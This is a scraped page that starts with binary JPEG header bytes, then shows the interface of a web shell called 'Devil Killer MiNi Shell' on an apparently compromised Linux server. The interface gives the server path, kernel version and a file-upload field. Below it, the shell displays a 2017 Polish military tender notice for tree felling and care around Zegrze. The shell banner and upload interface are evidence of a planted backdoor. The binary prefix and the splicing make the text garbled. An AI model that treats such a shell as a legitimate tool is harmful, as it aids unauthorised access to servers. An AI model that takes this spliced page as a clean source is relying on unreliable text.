JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170308/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170308/38941-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.26wog.wp.mil.pl' target='_blank'>http://www.26wog.wp.mil.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 38941 - 2017
              z dnia 2017-03-08 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Zegrze: WYCINKA I PIELĘGNACJA DRZEW I KRZEWÓW, USUWANIE I KARCZOWANIE SAMOSIEWÓW I ODROSTÓW, FREZOWANIE KARP NA TERNACH KOMPLEKSÓW WOJSKOWYCH BĘDĄCYCH NA ZAOPATRZENIU 26 WOJSKOWEGO ODDZIAŁU GOSPODARCZEGO W ZEGRZU.
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>26 Wojskowy Oddział Gospodarczy, krajowy numer identyfikacyjny
              142917040, ul.
              Juzistek 
              2,
              05-131 
              Zegrze, woj.
              mazowieckie, państwo
              Polska, tel.
              261883896, e-mail
              jw4809.zp@ron.mil.pl, faks
              261883868.
              <br />
              Adres strony internetowej (URL): www.26wog.wp.mil.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: jednostka wojskowa</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.26wog.wp.mil.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>WYCINKA I PIELĘGNACJA DRZEW I KRZEWÓW, USUWANIE I KARCZOWANIE SAMOSIEWÓW I ODROSTÓW, FREZOWANIE KARP NA TERNACH KOMPLEKSÓW WOJSKOWYCH BĘDĄCYCH NA ZAOPATRZENIU 26 WOJSKOWEGO ODDZIAŁU GOSPODARCZEGO W ZEGRZU.
<br /><b>Numer referencyjny: </b>Nr sprawy: ZP/103/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiotem zamówienia jest wycinka i pielęgnacja drzew i krzewów, usuwanie 
i karczowanie samosiewów i odrostów, frezowanie karp na ternach kompleksów wojskowych będących na zaopatrzeniu 26 Wojskowego Oddziału Gospodarczego 
w Zegrzu.
2.	Szczegółowy opis przedmiotu zamówienia wraz z ilościami dla poszczególnych części znajduje się w załącznikach: 
załącznik nr 2 do SIWZ - Formularz cenowy  dotyczy Części I;
załącznik nr 2a do SIWZ - Formularz cenowy  dotyczy Części II.
3.	Wykonawca zobowiązany jest zrealizować zamówienie na warunkach i zasadach określonych w projekcie umowy, stanowiący załącznik nr 6 do SIWZ.
4.	Zamawiający dopuszcza składanie ofert w podziale na 2 części.
Część 1 - usługa polegająca na wycince drzew oraz krzewów ( w tym wywrotów i złomów), pielęgnacji drzew i krzewów  (poza strefą konserwatorską), usuwaniu samosiewów i  odrostów, karczowaniu samosiewów i odrostów, karczowaniu krzewów, frezowaniu karp, na terenach kompleksów wojskowych w rejonie działania 26 Wojskowego Oddziału Gospodarczego.
Część 2 - usługa polegająca na: pielęgnacji drzew i krzewów, na terenach kompleksów wojskowych w rejonie działania  26 Wojskowego Oddziału Gospodarczego ( rejony: Kazuń, Modlin, Ostrów Mazowiecka, Przasnysz, Ciechanów)  w strefie konserwatorskiej.
5.	Wykonawca może złożyć ofertę na jedną lub więcej części, przy czym tylko jedną ofertę w danej części.
6.	Oferty składane w zakresie poszczególnych części zamówienia muszą obejmować całość zawartego w nich przedmiotu zamówienia. Oferty 
nie zawierające pełnego zakresu przedmiotu zamówienia w wybranej części zamówienia zostaną odrzucone.
7.	W trakcie badania i oceny ofert Zamawiający będzie rozpatrywał każdą część oddzielnie.
8.	Zamawiający  przewiduje możliwość udzielenia zamówień Wykonawcy,   
o których  mowa w art. 67 ust. 1 pkt 6 ustawy Pzp  (art.36 ust. 2 pkt 3 ustawy Pzp) polegającym na powtórzeniu podobnych usług w okresie 3 lat od dnia udzielenia zamówienia podstawowego. W przypadku nieprzewidzianego zwiększenia zakresu prac związanych z wycinką i pielęgnacją ( np. wywroty 
i złomy, które powstały na skutek złych warunków atmosferycznych, decyzje administracyjne, których wystawienia nie można było wcześniej przewidzieć oraz przejęcia dodatkowych kompleksów wojskowych) w wysokości do 50 % zamówienia podstawowego. Udzielenie zamówienia, wymagać będzie zawarcia aneksu do umowy. 

<br /><br /><b>II.5) Główny kod CPV: </b>77211400-6<br /><b> Dodatkowe kody CPV:</b>77211500-7,
                77300000-3<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający  przewiduje możliwość udzielenia zamówień Wykonawcy,   
o których  mowa w art. 67 ust. 1 pkt 6 ustawy Pzp  (art.36 ust. 2 pkt 3 ustawy Pzp) polegającym na powtórzeniu podobnych usług w okresie 3 lat od dnia udzielenia zamówienia podstawowego. W przypadku nieprzewidzianego zwiększenia zakresu prac związanych z wycinką i pielęgnacją ( np. wywroty 
i złomy, które powstały na skutek złych warunków atmosferycznych, decyzje administracyjne, których wystawienia nie można było wcześniej przewidzieć oraz przejęcia dodatkowych kompleksów wojskowych) w wysokości do 50 % zamówienia podstawowego. Udzielenie zamówienia, wymagać będzie zawarcia aneksu do umowy. 
<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/11/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Warunek spełni Wykonawca, który wykaże, że jest ubezpieczony 
od odpowiedzialności cywilnej w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia na sumę gwarancyjną:
dla części I: nie mniejszą niż 100 000,00 zł;
dla części II: nie mniejszą niż 30 000,00 zł;
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                1)	Zdolność techniczna:

Opis spełnienia warunku:
w Części I: Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował na czas realizacji usługi: 

	samochodem z podnośnikiem koszowym  zwyżka  do prac 
na wysokości  co najmniej 1 szt.,
	pojazdem mechanicznym do wywozu zrębów, odpadów 
i przewożenia pociętego drewna( np. ciągnik, samochód 
z przyczepą) - co najmniej 1 szt.,
	rębakiem do gałęzi - co najmniej 2 szt.,
	frezarką - co najmniej 2 szt.,
	piłą spalinową łańcuchową - co najmniej 4 szt.,
	narzędziami ogrodniczymi:
taczką - co najmniej 3 szt.,
grabiami - co najmniej 5 szt.,
miotłą - co najmniej 3 szt.,
łopatą ogrodową - co najmniej 3 szt.,
szpadlem - co najmniej 2 szt.,
sekatorem - co najmniej 5 szt.,
kosą - co najmniej 2 szt.
w Części II: Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował na czas realizacji usługi: 

	samochodem z podnośnikiem koszowym  zwyżka  do prac 
na wysokości  co najmniej 1 szt.,
	pojazdem mechanicznym do wywozu zrębów, odpadów 
i przewożenia pociętego drewna( np. ciągnik, samochód 
z przyczepą) - co najmniej 1 szt.,
	rębakiem do gałęzi - co najmniej 1 szt.,
	frezarką - co najmniej 1 szt.,
	piłą spalinową łańcuchową - co najmniej 3 szt.,
	narzędzia ogrodnicze:
taczką - co najmniej 1 szt.,
grabiami - co najmniej 2 szt.,
miotłą - co najmniej 1 szt.,
łopatą ogrodową - co najmniej 1 szt.,
szpadlem - co najmniej 1 szt.,
sekatorem - co najmniej 1 szt.,
kosą - co najmniej 1 szt.

Wykaz sprzętu wraz z informacją o podstawie do dysponowania tymi zasobami stanowi Załącznik nr 7,7a do SIWZ.



2)	zdolności zawodowej:
Opis spełnienia warunku:

Zamawiający uzna warunek za spełniony, jeżeli:
	w Części I: Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował:
co najmniej 4 osobami dokonującymi cięć (w tym 2 osoby posiadające uprawnienia do prac na wysokości);
co najmniej 5 osobami dokonującymi mielenia gałęzi oraz wszelkich prac transportowych  i porządkowych;

	w Części II: Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował:
co najmniej 2 osobami dokonującymi cięć pielęgnacyjnych 
posiadającymi uprawnienia do prac na wysokości; 
co najmniej 1 osobą (osoba nadzorująca) posiadającą uprawnienia  zgodnie z art. 37 b ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami 1. Pracami konserwatorskimi oraz pracami restauratorskimi, prowadzonymi przy zabytkach będących parkami wpisanymi do rejestru albo innego rodzaju zorganizowaną zielenią wpisaną do rejestru kieruje osoba, która ukończyła studia drugiego stopnia lub jednolite studia magisterskie, których program obejmuje zajęcia lub grupy zajęć umożliwiające nabycie wiedzy i umiejętności w tym zakresie, oraz która po rozpoczęciu studiów drugiego stopnia lub po zaliczeniu szóstego semestru jednolitych studiów magisterskich, przez 
co najmniej 9 miesięcy brała udział w pracach konserwatorskich lub pracach restauratorskich prowadzonych przy tego rodzaju zabytkach wpisanych do rejestru, lub była zatrudniona przy tych pracach w muzeum będącym instytucją kultury.
Przepis ust. 1 stosuje się do osób, które samodzielnie wykonują prace konserwatorskie oraz prace restauratorskie, prowadzone przy zabytkach będących parkami wpisanymi do rejestru albo innego rodzaju zorganizowaną zielenią wpisaną do rejestru.
Prace o charakterze technicznym w zakresie, o którym mowa 
w ust. 1, samodzielnie wykonuje osoba, która posiada świadectwo ukończenia szkoły średniej zawodowej oraz tytuł zawodowy albo wykształcenie średnie i dyplom potwierdzający kwalifikacje zawodowe w zawodach związanych z pielęgnacją zieleni, 
albo przez co najmniej 9 miesięcy brała udział w tego rodzaju pracach prowadzonych przy zabytkach wpisanych do rejestru 
lub była zatrudniona przy tych pracach w muzeum będącym instytucją kultury.
	co najmniej 2 osoby dokonujące: mielenia gałęzi 
oraz wykonujące wszelkie prace transportowe i porządkowe.
Wykaz osób wraz z informacją o podstawie do dysponowania tymi zasobami stanowi Załącznik nr 6, 6a do SIWZ.

Uwaga:

W przypadku składania oferty na więcej niż jedną część Wykonawca może wykazać dysponowanie w/w osobami, maszynami i narzędziami dla obu części.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1.	Zamawiający zgodnie z art. 26 ust. 2 ustawy Pzp  przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta (w ramach danej części) została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni terminie, aktualnych na dzień złożenia następujących oświadczeń lub dokumentów potwierdzających okoliczności , o których mowa w art. 25 ust. 1 ustawy Pzp, tj.:
a.	dla części I i II: 
odpisu z właściwego rejestru lub z centralnej ewidencji i informacji 
o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp.
dokument potwierdzający ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności  związanej 
z przedmiotem zamówienia na sumę gwarancyjną:
dla części I: nie mniejszą niż 100 000,00 zł;
dla części II: nie mniejszą niż 30 000,00 zł;
wykaz osób, skierowanych przez Wykonawcę do realizacji przedmiotu zamówienia publicznego w szczególności odpowiedzialnych 
za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych 
do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nich czynności oraz informację o podstawie do dysponowania tymi osobami  zgodnie z  załącznikiem nr 6 i 6a do SIWZ  (odpowiednio 
do części).
wykaz maszyn i narzędzi wraz z informacją o podstawie do dysponowania tymi zasobami  - zgodnie załącznikiem nr 7 i 7a do SIWZ  (odpowiednio do części).
2.	Wybrany w drodze postępowania Wykonawca zobowiązany będzie przed podpisaniem umowy do przedłożenia Zamawiającemu: 
Dla części II:
1)	uprawnienia  zgodnie z art. 37 b ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami 
3.	W przypadku wskazania przez Wykonawcę dostępności oświadczeń 
lub dokumentów, o których mowa w pkt 1, w formie elektronicznej 
pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający pobiera samodzielnie z tych baz danych wskazane przez Wykonawcę oświadczenia lub dokumenty. 
4.	W przypadku wskazania przez Wykonawcę dostępności oświadczeń 
lub dokumentów, o których mowa w pkt 1, które znajdują się w posiadaniu Zamawiającego, w szczególności oświadczeń lub dokumentów przechowywanych przez Zamawiającego zgodnie z art. 97 ust 1 ustawy Pzp, Zamawiający w celu potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 pkt 3 ustawy Pzp, korzysta z posiadanych oświadczeń lub dokumentów, o ile są one aktualne. 

PODMIOT NA ZASOBY, KTÓREGO POWOŁUJE SIĘ WYKONAWCA

5.	Wykonawca może w celu potwierdzenia spełniania warunków, o których mowa w Rozdziale V niniejszej SIWZ w stosownych sytuacjach oraz 
w odniesieniu do konkretnego zamówienia, lub jego części, polegać 
na zdolnościach technicznych lub zawodowych lub sytuacji finansowej 
lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.
6.	Zamawiający jednocześnie informuje, iż "stosowna sytuacja", o której mowa 
w pkt 5 wystąpi wyłącznie w przypadku, gdy:
1)	Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów udowodni Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. Wzór zobowiązania do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia określa zał. nr 4 do SIWZ. 
2)	Zamawiający oceni, czy udostępnione Wykonawcy przez inne podmioty zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu oraz zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w 	 art. 24 ust. 1 pkt 13-23 i ust. 5 pkt 1 i 2 ustawy Pzp.
3)	w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują roboty budowlane lub usługi, do realizacji, których te zdolności są wymagane.
7.	Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania - 
w zakresie, w jakim powołuje się na ich zasoby - warunków udziału 
w postępowaniu zamieszcza informacje o tych podmiotach 
w oświadczeniu - zał. nr 3 do SIWZ.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Oświadczenie w zakresie wskazanym w zał. nr 3 do SIWZ. Informacje zawarte w oświadczeniu będą stanowić wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
